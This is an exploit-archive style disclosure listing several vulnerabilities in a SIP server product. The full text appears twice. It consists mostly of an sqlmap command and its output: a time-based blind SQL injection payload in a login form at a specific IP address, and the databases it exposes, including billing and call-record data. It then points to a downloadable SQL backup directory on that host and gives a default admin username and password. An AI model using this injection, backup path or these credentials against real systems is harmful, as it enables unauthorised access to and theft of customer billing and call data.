SIP Server by Kerne.org - Multiple Vulnerabilties
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : Kerne.org
####################################################################
[1] Time-Based Blind Injection [POST]
========================================
sqlmap.py -u "http://177.129.8.146/admin/index.php"
--data="action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" -p
"username" --level=5 --risk=5 --dbs
sqlmap identified the following injection points with a total of 1751
HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12"
AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12"
AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5
available databases [5]:
[*] billing
[*] cdr
[*] information_schema
[*] proftpd
[*] test
[2] Backup download
====================
Go To [http://177.129.8.146/admin/sql/]
You Find Sql Files And Download
[3] Default Data Admin Login:
==============================
Username: Operations
Password: k3cn18
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
===================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : Kerne.org
####################################################################
[1] Time-Based Blind Injection [POST]
========================================
sqlmap.py -u "http://177.129.8.146/admin/index.php"
--data="action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" -p
"username" --level=5 --risk=5 --dbs
sqlmap identified the following injection points with a total of 1751
HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12"
AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12"
AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5
available databases [5]:
[*] billing
[*] cdr
[*] information_schema
[*] proftpd
[*] test
[2] Backup download
====================
Go To [http://177.129.8.146/admin/sql/]
You Find Sql Files And Download
[3] Default Data Admin Login:
==============================
Username: Operations
Password: k3cn18
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information